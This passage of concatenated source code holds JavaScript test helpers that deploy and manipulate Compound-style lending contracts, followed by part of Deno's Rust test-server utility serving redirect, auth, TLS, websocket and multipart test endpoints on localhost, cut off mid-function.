const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
const liquidationIncentive = etherMantissa(1);
await send(unitroller, '_setPendingImplementation', [comptroller._address]);
await send(comptroller, '_become', [unitroller._address]);
mergeInterface(unitroller, comptroller);
await send(unitroller, '_setLiquidationIncentive', [liquidationIncentive]);
await send(unitroller, '_setCloseFactor', [closeFactor]);
await send(unitroller, '_setMaxAssets', [maxAssets]);
await send(unitroller, '_setPriceOracle', [priceOracle._address]);
return Object.assign(unitroller, { priceOracle });
}
if (kind == 'unitroller') {
const unitroller = opts.unitroller || await deploy('Unitroller');
const comptroller = await deploy('ComptrollerHarness');
const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
const liquidationIncentive = etherMantissa(1);
const comp = opts.comp || await deploy('Comp', [opts.compOwner || root]);
const compRate = etherUnsigned(dfn(opts.compRate, 1e18));
const compMarkets = opts.compMarkets || [];
const otherMarkets = opts.otherMarkets || [];
await send(unitroller, '_setPendingImplementation', [comptroller._address]);
await send(comptroller, '_become', [unitroller._address, compRate, compMarkets, otherMarkets]);
mergeInterface(unitroller, comptroller);
await send(unitroller, '_setLiquidationIncentive', [liquidationIncentive]);
await send(unitroller, '_setCloseFactor', [closeFactor]);
await send(unitroller, '_setMaxAssets', [maxAssets]);
await send(unitroller, '_setPriceOracle', [priceOracle._address]);
await send(unitroller, 'setCompAddress', [comp._address]); // harness only
return Object.assign(unitroller, { priceOracle, comp });
}
}
async function makeCToken(opts = {}) {
const {
root = saddle.account,
kind = 'cerc20'
} = opts || {};
const comptroller = opts.comptroller || await makeComptroller(opts.comptrollerOpts);
const interestRateModel = opts.interestRateModel || await makeInterestRateModel(opts.interestRateModelOpts);
const exchangeRate = etherMantissa(dfn(opts.exchangeRate, 1));
const decimals = etherUnsigned(dfn(opts.decimals, 8));
const symbol = opts.symbol || (kind === 'cether' ? 'cETH' : 'cOMG');
const name = opts.name || `CToken ${symbol}`;
const admin = opts.admin || root;
let cToken, underlying;
let cDelegator, cDelegatee, cDaiMaker;
switch (kind) {
case 'cether':
cToken = await deploy('CEtherHarness',
[
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin
])
break;
case 'cdai':
cDaiMaker = await deploy('CDaiDelegateMakerHarness');
underlying = cDaiMaker;
cDelegatee = await deploy('CDaiDelegateHarness');
cDelegator = await deploy('CErc20Delegator',
[
underlying._address,
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin,
cDelegatee._address,
encodeParameters(['address', 'address'], [cDaiMaker._address, cDaiMaker._address])
]
);
cToken = await saddle.getContractAt('CDaiDelegateHarness', cDelegator._address); // XXXS at
break;
case 'cerc20':
default:
underlying = opts.underlying || await makeToken(opts.underlyingOpts);
cDelegatee = await deploy('CErc20DelegateHarness');
cDelegator = await deploy('CErc20Delegator',
[
underlying._address,
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin,
cDelegatee._address,
"0x0"
]
);
cToken = await saddle.getContractAt('CErc20DelegateHarness', cDelegator._address); // XXXS at
break;
}
if (opts.supportMarket) {
await send(comptroller, '_supportMarket', [cToken._address]);
}
if (opts.addCompMarket) {
await send(comptroller, '_addCompMarket', [cToken._address]);
}
if (opts.underlyingPrice) {
const price = etherMantissa(opts.underlyingPrice);
await send(comptroller.priceOracle, 'setUnderlyingPrice', [cToken._address, price]);
}
if (opts.collateralFactor) {
const factor = etherMantissa(opts.collateralFactor);
expect(await send(comptroller, '_setCollateralFactor', [cToken._address, factor])).toSucceed();
}
return Object.assign(cToken, { name, symbol, underlying, comptroller, interestRateModel });
}
async function makeInterestRateModel(opts = {}) {
const {
root = saddle.account,
kind = 'harnessed'
} = opts || {};
if (kind == 'harnessed') {
const borrowRate = etherMantissa(dfn(opts.borrowRate, 0));
return await deploy('InterestRateModelHarness', [borrowRate]);
}
if (kind == 'false-marker') {
const borrowRate = etherMantissa(dfn(opts.borrowRate, 0));
return await deploy('FalseMarkerMethodInterestRateModel', [borrowRate]);
}
if (kind == 'white-paper') {
const baseRate = etherMantissa(dfn(opts.baseRate, 0));
const multiplier = etherMantissa(dfn(opts.multiplier, 1e-18));
return await deploy('WhitePaperInterestRateModel', [baseRate, multiplier]);
}
if (kind == 'jump-rate') {
const baseRate = etherMantissa(dfn(opts.baseRate, 0));
const multiplier = etherMantissa(dfn(opts.multiplier, 1e-18));
const jump = etherMantissa(dfn(opts.jump, 0));
const kink = etherMantissa(dfn(opts.kink, 0));
return await deploy('JumpRateModel', [baseRate, multiplier, jump, kink]);
}
}
async function makePriceOracle(opts = {}) {
const {
root = saddle.account,
kind = 'simple'
} = opts || {};
if (kind == 'simple') {
return await deploy('SimplePriceOracle');
}
}
async function makeToken(opts = {}) {
const {
root = saddle.account,
kind = 'erc20'
} = opts || {};
if (kind == 'erc20') {
const quantity = etherUnsigned(dfn(opts.quantity, 1e25));
const decimals = etherUnsigned(dfn(opts.decimals, 18));
const symbol = opts.symbol || 'OMG';
const name = opts.name || `Erc20 ${symbol}`;
return await deploy('ERC20Harness', [quantity, name, decimals, symbol]);
}
}
async function balanceOf(token, account) {
return etherUnsigned(await call(token, 'balanceOf', [account]));
}
async function totalSupply(token) {
return etherUnsigned(await call(token, 'totalSupply'));
}
async function borrowSnapshot(cToken, account) {
const { principal, interestIndex } = await call(cToken, 'harnessAccountBorrows', [account]);
return { principal: etherUnsigned(principal), interestIndex: etherUnsigned(interestIndex) };
}
async function totalBorrows(cToken) {
return etherUnsigned(await call(cToken, 'totalBorrows'));
}
async function totalReserves(cToken) {
return etherUnsigned(await call(cToken, 'totalReserves'));
}
async function enterMarkets(cTokens, from) {
return await send(cTokens[0].comptroller, 'enterMarkets', [cTokens.map(c => c._address)], { from });
}
async function fastForward(cToken, blocks = 5) {
return await send(cToken, 'harnessFastForward', [blocks]);
}
async function setBalance(cToken, account, balance) {
return await send(cToken, 'harnessSetBalance', [account, balance]);
}
async function setEtherBalance(cEther, balance) {
const current = await etherBalance(cEther._address);
const root = saddle.account;
expect(await send(cEther, 'harnessDoTransferOut', [root, current])).toSucceed();
expect(await send(cEther, 'harnessDoTransferIn', [root, balance], { value: balance })).toSucceed();
}
async function getBalances(cTokens, accounts) {
const balances = {};
for (let cToken of cTokens) {
const cBalances = balances[cToken._address] = {};
for (let account of accounts) {
cBalances[account] = {
eth: await etherBalance(account),
cash: cToken.underlying && await balanceOf(cToken.underlying, account),
tokens: await balanceOf(cToken, account),
borrows: (await borrowSnapshot(cToken, account)).principal
};
}
cBalances[cToken._address] = {
eth: await etherBalance(cToken._address),
cash: cToken.underlying && await balanceOf(cToken.underlying, cToken._address),
tokens: await totalSupply(cToken),
borrows: await totalBorrows(cToken),
reserves: await totalReserves(cToken)
};
}
return balances;
}
async function adjustBalances(balances, deltas) {
for (let delta of deltas) {
let cToken, account, key, diff;
if (delta.length == 4) {
([cToken, account, key, diff] = delta);
} else {
([cToken, key, diff] = delta);
account = cToken._address;
}
balances[cToken._address][account][key] = balances[cToken._address][account][key].add(diff);
}
return balances;
}
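// Sketch of the two delta shapes accepted above (names are illustrative):
// [cToken, account, 'cash', amount] adjusts a single account's entry, while
// [cToken, 'borrows', amount] defaults the account to the cToken's own address.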
async function preApprove(cToken, from, amount, opts = {}) {
if (dfn(opts.faucet, true)) {
expect(await send(cToken.underlying, 'harnessSetBalance', [from, amount], { from })).toSucceed();
}
return send(cToken.underlying, 'approve', [cToken._address, amount], { from });
}
async function quickMint(cToken, minter, mintAmount, opts = {}) {
// make sure to accrue interest
await fastForward(cToken, 1);
if (dfn(opts.approve, true)) {
expect(await preApprove(cToken, minter, mintAmount, opts)).toSucceed();
}
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'mint', [mintAmount], { from: minter });
}
async function preSupply(cToken, account, tokens, opts = {}) {
if (dfn(opts.total, true)) {
expect(await send(cToken, 'harnessSetTotalSupply', [tokens])).toSucceed();
}
return send(cToken, 'harnessSetBalance', [account, tokens]);
}
async function quickRedeem(cToken, redeemer, redeemTokens, opts = {}) {
await fastForward(cToken, 1);
if (dfn(opts.supply, true)) {
expect(await preSupply(cToken, redeemer, redeemTokens, opts)).toSucceed();
}
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'redeem', [redeemTokens], { from: redeemer });
}
async function quickRedeemUnderlying(cToken, redeemer, redeemAmount, opts = {}) {
await fastForward(cToken, 1);
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'redeemUnderlying', [redeemAmount], { from: redeemer });
}
async function setOraclePrice(cToken, price) {
return send(cToken.comptroller.priceOracle, 'setUnderlyingPrice', [cToken._address, etherMantissa(price)]);
}
async function setBorrowRate(cToken, rate) {
return send(cToken.interestRateModel, 'setBorrowRate', [etherMantissa(rate)]);
}
async function getBorrowRate(interestRateModel, cash, borrows, reserves) {
return call(interestRateModel, 'getBorrowRate', [cash, borrows, reserves].map(etherUnsigned));
}
async function getSupplyRate(interestRateModel, cash, borrows, reserves, reserveFactor) {
return call(interestRateModel, 'getSupplyRate', [cash, borrows, reserves, reserveFactor].map(etherUnsigned));
}
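// Fakes an existing borrow position by writing the totals, the borrower's
// snapshot, the market borrow index, and the block numbers directly through
// the harness setters.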
async function pretendBorrow(cToken, borrower, accountIndex, marketIndex, principalRaw, blockNumber = 2e7) {
await send(cToken, 'harnessSetTotalBorrows', [etherUnsigned(principalRaw)]);
await send(cToken, 'harnessSetAccountBorrows', [borrower, etherUnsigned(principalRaw), etherMantissa(accountIndex)]);
await send(cToken, 'harnessSetBorrowIndex', [etherMantissa(marketIndex)]);
await send(cToken, 'harnessSetAccrualBlockNumber', [etherUnsigned(blockNumber)]);
await send(cToken, 'harnessSetBlockNumber', [etherUnsigned(blockNumber)]);
}
module.exports = {
makeComptroller,
makeCToken,
makeInterestRateModel,
makePriceOracle,
makeToken,
balanceOf,
totalSupply,
borrowSnapshot,
totalBorrows,
totalReserves,
enterMarkets,
fastForward,
setBalance,
setEtherBalance,
getBalances,
adjustBalances,
preApprove,
quickMint,
preSupply,
quickRedeem,
quickRedeemUnderlying,
setOraclePrice,
setBorrowRate,
getBorrowRate,
getSupplyRate,
pretendBorrow
};
lib.rs
// Copyright 2018-2021 the Deno authors. All rights reserved. MIT license.
// Usage: provide a port as argument to run hyper_hello benchmark server
// otherwise this starts multiple servers on many ports for test endpoints.
use anyhow::anyhow;
use futures::FutureExt;
use futures::Stream;
use futures::StreamExt;
use hyper::header::HeaderValue;
use hyper::server::Server;
use hyper::service::make_service_fn;
use hyper::service::service_fn;
use hyper::Body;
use hyper::Request;
use hyper::Response;
use hyper::StatusCode;
use lazy_static::lazy_static;
use os_pipe::pipe;
use regex::Regex;
use rustls::Certificate;
use rustls::PrivateKey;
use serde::Serialize;
use std::collections::HashMap;
use std::convert::Infallible;
use std::env;
use std::io;
use std::io::Read;
use std::io::Write;
use std::mem::replace;
use std::net::SocketAddr;
use std::path::PathBuf;
use std::pin::Pin;
use std::process::Child;
use std::process::Command;
use std::process::Output;
use std::process::Stdio;
use std::result::Result;
use std::sync::Arc;
use std::sync::Mutex;
use std::sync::MutexGuard;
use std::task::Context;
use std::task::Poll;
use tempfile::TempDir;
use tokio::io::AsyncWriteExt;
use tokio::net::TcpListener;
use tokio::net::TcpStream;
use tokio_rustls::rustls;
use tokio_rustls::TlsAcceptor;
use tokio_tungstenite::accept_async;
pub mod lsp;
pub mod pty;
const PORT: u16 = 4545;
const TEST_AUTH_TOKEN: &str = "abcdef123456789";
const TEST_BASIC_AUTH_USERNAME: &str = "testuser123";
const TEST_BASIC_AUTH_PASSWORD: &str = "testpassabc";
const REDIRECT_PORT: u16 = 4546;
const ANOTHER_REDIRECT_PORT: u16 = 4547;
const DOUBLE_REDIRECTS_PORT: u16 = 4548;
const INF_REDIRECTS_PORT: u16 = 4549;
const REDIRECT_ABSOLUTE_PORT: u16 = 4550;
const AUTH_REDIRECT_PORT: u16 = 4551;
const TLS_CLIENT_AUTH_PORT: u16 = 4552;
const BASIC_AUTH_REDIRECT_PORT: u16 = 4554;
const TLS_PORT: u16 = 4557;
const HTTPS_PORT: u16 = 5545;
const H1_ONLY_PORT: u16 = 5546;
const H2_ONLY_PORT: u16 = 5547;
const HTTPS_CLIENT_AUTH_PORT: u16 = 5552;
const WS_PORT: u16 = 4242;
const WSS_PORT: u16 = 4243;
const WS_CLOSE_PORT: u16 = 4244;
pub const PERMISSION_VARIANTS: [&str; 5] =
["read", "write", "env", "net", "run"];
pub const PERMISSION_DENIED_PATTERN: &str = "PermissionDenied";
lazy_static! {
// STRIP_ANSI_RE and strip_ansi_codes are lifted from the "console" crate.
// Copyright 2017 Armin Ronacher <[email protected]>. MIT License.
static ref STRIP_ANSI_RE: Regex = Regex::new(
r"[\x1b\x9b][\[()#;?]*(?:[0-9]{1,4}(?:;[0-9]{0,4})*)?[0-9A-PRZcf-nqry=><]"
).unwrap();
static ref GUARD: Mutex<HttpServerCount> = Mutex::new(HttpServerCount::default());
}
pub fn root_path() -> PathBuf {
PathBuf::from(concat!(env!("CARGO_MANIFEST_DIR")))
.parent()
.unwrap()
.to_path_buf()
}
pub fn prebuilt_path() -> PathBuf {
third_party_path().join("prebuilt")
}
pub fn tests_path() -> PathBuf {
root_path().join("cli").join("tests")
}
pub fn testdata_path() -> PathBuf {
tests_path().join("testdata")
}
pub fn third_party_path() -> PathBuf {
root_path().join("third_party")
}
pub fn std_path() -> PathBuf {
root_path().join("test_util").join("std")
}
pub fn target_dir() -> PathBuf {
let current_exe = std::env::current_exe().unwrap();
let target_dir = current_exe.parent().unwrap().parent().unwrap();
target_dir.into()
}
pub fn deno_exe_path() -> PathBuf {
// Something like /Users/rld/src/deno/target/debug/deps/deno
let mut p = target_dir().join("deno");
if cfg!(windows) {
p.set_extension("exe");
}
p
}
pub fn prebuilt_tool_path(tool: &str) -> PathBuf {
let mut exe = tool.to_string();
exe.push_str(if cfg!(windows) { ".exe" } else { "" });
prebuilt_path().join(platform_dir_name()).join(exe)
}
fn platform_dir_name() -> &'static str {
if cfg!(target_os = "linux") {
"linux64"
} else if cfg!(target_os = "macos") {
"mac"
} else if cfg!(target_os = "windows") {
"win"
} else {
unreachable!()
}
}
pub fn test_server_path() -> PathBuf {
let mut p = target_dir().join("test_server");
if cfg!(windows) {
p.set_extension("exe");
}
p
}
fn ensure_test_server_built() {
// if the test server doesn't exist then remind the developer to build first
if !test_server_path().exists() {
panic!(
"Test server not found. Please cargo build before running the tests."
);
}
}
/// Benchmark server that just serves "hello world" responses.
async fn hyper_hello(port: u16) {
println!("hyper hello");
let addr = SocketAddr::from(([127, 0, 0, 1], port));
let hello_svc = make_service_fn(|_| async move {
Ok::<_, Infallible>(service_fn(move |_: Request<Body>| async move {
Ok::<_, Infallible>(Response::new(Body::from("Hello World!")))
}))
});
let server = Server::bind(&addr).serve(hello_svc);
if let Err(e) = server.await {
eprintln!("server error: {}", e);
}
}
fn redirect_resp(url: String) -> Response<Body> {
let mut redirect_resp = Response::new(Body::empty());
*redirect_resp.status_mut() = StatusCode::MOVED_PERMANENTLY;
redirect_resp.headers_mut().insert(
hyper::header::LOCATION,
HeaderValue::from_str(&url[..]).unwrap(),
);
redirect_resp
}
async fn redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
Ok(redirect_resp(url))
}
async fn double_redirects(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", REDIRECT_PORT, p);
Ok(redirect_resp(url))
}
async fn inf_redirects(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", INF_REDIRECTS_PORT, p);
Ok(redirect_resp(url))
}
async fn another_redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}/subdir{}", PORT, p);
Ok(redirect_resp(url))
}
async fn auth_redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
if let Some(auth) = req
.headers()
.get("authorization")
.map(|v| v.to_str().unwrap())
{
if auth.to_lowercase() == format!("bearer {}", TEST_AUTH_TOKEN) {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
return Ok(redirect_resp(url));
}
}
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_FOUND;
Ok(resp)
}
async fn basic_auth_redirect(
req: Request<Body>,
) -> hyper::Result<Response<Body>> {
if let Some(auth) = req
.headers()
.get("authorization")
.map(|v| v.to_str().unwrap())
{
let credentials =
format!("{}:{}", TEST_BASIC_AUTH_USERNAME, TEST_BASIC_AUTH_PASSWORD);
if auth == format!("Basic {}", base64::encode(credentials)) {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
return Ok(redirect_resp(url));
}
}
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_FOUND;
Ok(resp)
}
async fn run_ws_server(addr: &SocketAddr) {
let listener = TcpListener::bind(addr).await.unwrap();
println!("ready: ws"); // Eye catcher for HttpServerCount
while let Ok((stream, _addr)) = listener.accept().await {
tokio::spawn(async move {
let ws_stream_fut = accept_async(stream);
let ws_stream = ws_stream_fut.await;
if let Ok(ws_stream) = ws_stream {
let (tx, rx) = ws_stream.split();
rx.forward(tx)
.map(|result| {
if let Err(e) = result {
println!("websocket server error: {:?}", e);
}
})
.await;
}
});
}
}
async fn run_ws_close_server(addr: &SocketAddr) {
let listener = TcpListener::bind(addr).await.unwrap();
while let Ok((stream, _addr)) = listener.accept().await {
tokio::spawn(async move {
let ws_stream_fut = accept_async(stream);
let ws_stream = ws_stream_fut.await;
if let Ok(mut ws_stream) = ws_stream {
ws_stream.close(None).await.unwrap();
}
});
}
}
enum SupportedHttpVersions {
All,
Http1Only,
Http2Only,
}
impl Default for SupportedHttpVersions {
fn default() -> SupportedHttpVersions {
SupportedHttpVersions::All
}
}
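/// Builds a rustls server config from PEM files under the testdata
/// directory. Client certificates are allowed but not required, and the
/// ALPN protocols are chosen according to `http_versions`.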
async fn get_tls_config(
cert: &str,
key: &str,
ca: &str,
http_versions: SupportedHttpVersions,
) -> io::Result<Arc<rustls::ServerConfig>> {
let cert_path = testdata_path().join(cert);
let key_path = testdata_path().join(key);
let ca_path = testdata_path().join(ca);
let cert_file = std::fs::File::open(cert_path)?;
let key_file = std::fs::File::open(key_path)?;
let ca_file = std::fs::File::open(ca_path)?;
let certs: Vec<Certificate> = {
let mut cert_reader = io::BufReader::new(cert_file);
rustls_pemfile::certs(&mut cert_reader)
.unwrap()
.into_iter()
.map(Certificate)
.collect()
};
let mut ca_cert_reader = io::BufReader::new(ca_file);
let ca_cert = rustls_pemfile::certs(&mut ca_cert_reader)
.expect("Cannot load CA certificate")
.remove(0);
let mut key_reader = io::BufReader::new(key_file);
let key = {
let pkcs8_key = rustls_pemfile::pkcs8_private_keys(&mut key_reader)
.expect("Cannot load key file");
let rsa_key = rustls_pemfile::rsa_private_keys(&mut key_reader)
.expect("Cannot load key file");
if !pkcs8_key.is_empty() {
Some(pkcs8_key[0].clone())
} else if !rsa_key.is_empty() {
Some(rsa_key[0].clone())
} else {
None
}
};
match key {
Some(key) => {
let mut root_cert_store = rustls::RootCertStore::empty();
root_cert_store.add(&rustls::Certificate(ca_cert)).unwrap();
// Allow (but do not require) client authentication.
let mut config = rustls::ServerConfig::builder()
.with_safe_defaults()
.with_client_cert_verifier(
rustls::server::AllowAnyAnonymousOrAuthenticatedClient::new(
root_cert_store,
),
)
.with_single_cert(certs, PrivateKey(key))
.map_err(|e| {
anyhow!("Error setting cert: {:?}", e);
})
.unwrap();
match http_versions {
SupportedHttpVersions::All => {
config.alpn_protocols = vec!["h2".into(), "http/1.1".into()];
}
SupportedHttpVersions::Http1Only => {}
SupportedHttpVersions::Http2Only => {
config.alpn_protocols = vec!["h2".into()];
}
}
Ok(Arc::new(config))
}
None => Err(io::Error::new(io::ErrorKind::Other, "Cannot find key")),
}
}
async fn run_wss_server(addr: &SocketAddr) {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
let listener = TcpListener::bind(addr).await.unwrap();
println!("ready: wss"); // Eye catcher for HttpServerCount
while let Ok((stream, _addr)) = listener.accept().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(tls_stream) => {
let ws_stream_fut = accept_async(tls_stream);
let ws_stream = ws_stream_fut.await;
if let Ok(ws_stream) = ws_stream {
let (tx, rx) = ws_stream.split();
rx.forward(tx)
.map(|result| {
if let Err(e) = result {
println!("Websocket server error: {:?}", e);
}
})
.await;
}
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
/// This server responds with 'PASS' if client authentication was successful. Try it by running
/// test_server and
/// curl --key cli/tests/testdata/tls/localhost.key \
/// --cert cli/tests/testdata/tls/localhost.crt \
/// --cacert cli/tests/testdata/tls/RootCA.crt https://localhost:4552/
async fn run_tls_client_auth_server() {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
// Listen on ALL addresses that localhost can resolve to.
let accept = |listener: tokio::net::TcpListener| {
async {
let result = listener.accept().await;
Some((result, listener))
}
.boxed()
};
let host_and_port = &format!("localhost:{}", TLS_CLIENT_AUTH_PORT);
let listeners = tokio::net::lookup_host(host_and_port)
.await
.expect(host_and_port)
.inspect(|address| println!("{} -> {}", host_and_port, address))
.map(tokio::net::TcpListener::bind)
.collect::<futures::stream::FuturesUnordered<_>>()
.collect::<Vec<_>>()
.await
.into_iter()
.map(|s| s.unwrap())
.map(|listener| futures::stream::unfold(listener, accept))
.collect::<Vec<_>>();
println!("ready: tls client auth"); // Eye catcher for HttpServerCount
let mut listeners = futures::stream::select_all(listeners);
while let Some(Ok((stream, _addr))) = listeners.next().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(mut tls_stream) => {
let (_, tls_session) = tls_stream.get_mut();
// We only need to check for the presence of client certificates
// here. Rustls ensures that they are valid and signed by the CA.
let response = match tls_session.peer_certificates() {
Some(_certs) => b"PASS",
None => b"FAIL",
};
tls_stream.write_all(response).await.unwrap();
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
/// This server responds with 'PASS' to every TLS connection, without
/// requiring client authentication. Try it by running test_server and
/// curl --cacert cli/tests/testdata/tls/RootCA.crt https://localhost:4557/
async fn run_tls_server() {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
// Listen on ALL addresses that localhost can resolve to.
let accept = |listener: tokio::net::TcpListener| {
async {
let result = listener.accept().await;
Some((result, listener))
}
.boxed()
};
let host_and_port = &format!("localhost:{}", TLS_PORT);
let listeners = tokio::net::lookup_host(host_and_port)
.await
.expect(host_and_port)
.inspect(|address| println!("{} -> {}", host_and_port, address))
.map(tokio::net::TcpListener::bind)
.collect::<futures::stream::FuturesUnordered<_>>()
.collect::<Vec<_>>()
.await
.into_iter()
.map(|s| s.unwrap())
.map(|listener| futures::stream::unfold(listener, accept))
.collect::<Vec<_>>();
println!("ready: tls"); // Eye catcher for HttpServerCount
let mut listeners = futures::stream::select_all(listeners);
while let Some(Ok((stream, _addr))) = listeners.next().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(mut tls_stream) => {
tls_stream.write_all(b"PASS").await.unwrap();
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
async fn absolute_redirect(
req: Request<Body>,
) -> hyper::Result<Response<Body>> {
let path = req.uri().path();
if path.starts_with("/REDIRECT") {
let url = &req.uri().path()[9..];
println!("URL: {:?}", url);
let redirect = redirect_resp(url.to_string());
return Ok(redirect);
}
if path.starts_with("/a/b/c") {
if let Some(x_loc) = req.headers().get("x-location") {
let loc = x_loc.to_str().unwrap();
return Ok(redirect_resp(loc.to_string()));
}
}
let mut file_path = testdata_path();
file_path.push(&req.uri().path()[1..]);
if file_path.is_dir() || !file_path.exists() {
let mut not_found_resp = Response::new(Body::empty());
*not_found_resp.status_mut() = StatusCode::NOT_FOUND;
return Ok(not_found_resp);
}
let file = tokio::fs::read(file_path).await.unwrap();
let file_resp = custom_headers(req.uri().path(), file);
Ok(file_resp)
}
async fn main_server(
req: Request<Body>,
) -> Result<Response<Body>, hyper::http::Error> {
return match (req.method(), req.uri().path()) {
(&hyper::Method::POST, "/echo_server") => {
let (parts, body) = req.into_parts();
let mut response = Response::new(body);
if let Some(status) = parts.headers.get("x-status") {
*response.status_mut() =
StatusCode::from_bytes(status.as_bytes()).unwrap();
}
if let Some(content_type) = parts.headers.get("content-type") {
response
.headers_mut()
.insert("content-type", content_type.clone());
}
if let Some(user_agent) = parts.headers.get("user-agent") {
response
.headers_mut()
.insert("user-agent", user_agent.clone());
}
Ok(response)
}
(&hyper::Method::POST, "/echo_multipart_file") => {
let body = req.into_body();
let bytes = &hyper::body::to_bytes(body).await.unwrap()[0..];
let start = b"--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"file\"; \
filename=\"file.bin\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n";
let end = b"\r\n--boundary--\r\n";
let b = [start as &[u8], bytes, end].concat();
let mut response = Response::new(Body::from(b));
response.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-data;boundary=boundary"),
);
Ok(response)
}
(_, "/multipart_form_data.txt") => {
let b = "Preamble\r\n\
--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"field_2\";\
filename=\"file.js\"\r\n\
Content-Type: text/javascript\r\n\
\r\n\
console.log(\"Hi\")\
\r\n--boundary--\r\n\
Epilogue";
let mut res = Response::new(Body::from(b));
res.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-data;boundary=boundary"),
);
Ok(res)
}
(_, "/multipart_form_bad_content_type") => {
let b = "Preamble\r\n\
--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"field_2\";\
filename=\"file.js\"\r\n\
Content-Type: text/javascript\r\n\
\r\n\
console.log(\"Hi\")\
\r\n--boundary--\r\n\
Epilogue";
let mut res = Response::new(Body::from(b));
res.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-datatststs;boundary=boundary"),
);
Ok(res)
}
(_, "/bad_redirect") => {
let mut res = Response::new(Body::empty());
*res.status_mut() = StatusCode::FOUND;
Ok(res)
}
(_, "/non_ascii_redirect") => {
let mut res = Response::new(Body::empty());
*res.status_mut() = StatusCode::MOVED_PERMANENTLY;
res.headers_mut().insert(
"location",
HeaderValue::from_bytes(b"/redirect\xae").unwrap(),
);
Ok(res)
}
(_, "/etag_script.ts") => {
let if_none_match = req.headers().get("if-none-match");
if if_none_match == Some(&HeaderValue::from_static("33a64df551425fcc55e"))
{
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_MODIFIED;
resp.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
resp
.headers_mut()
.insert("ETag", HeaderValue::from_static("33a64df551425fcc55e"));
Ok(resp)
} else {
let mut resp = Response::new(Body::from("console.log('etag')"));
resp.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
resp
.headers_mut()
.insert("ETag", HeaderValue::from_static("33a64df551425fcc55e"));
Ok(resp)
}
}
(_, "/xTypeScriptTypes.js") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.jsx") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res
.headers_mut()
.insert("Content-type", HeaderValue::from_static("text/jsx"));
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.ts") => {
let mut res =
Response::new(Body::from("export const foo: string = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
